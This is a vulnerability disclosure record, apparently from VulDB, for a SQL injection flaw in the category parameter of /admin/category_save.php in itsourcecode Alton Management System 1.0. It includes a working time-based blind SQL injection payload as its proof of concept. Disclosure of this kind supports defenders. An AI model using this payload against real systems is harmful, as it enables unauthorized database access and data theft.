| 제목 | itsourcecode Alton Management System 1.0 SQLi category_save.php |
|---|
| 설명 | Log in as an administrator user, access the "/admin/category_save.php" page, and pass in the "category" parameter. Due to lax filtering, this parameter can lead to SQL injection vulnerabilities.
---------------POC---------------
Parameter: category (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=1' AND (SELECT 4315 FROM (SELECT(SLEEP(5)))UBMb) AND 'gUvK'='gUvK
------------------------------------ |
|---|
| 원천 | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE8-3.md |
|---|
| 사용자 | Dee.Mirage (UID 71702) |
|---|
| 제출 | 2024. 07. 27. PM 12:30 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 07. 30. PM 03:29 (3 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 273144 [itsourcecode Alton Management System 1.0 /admin/category_save.php 범주 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|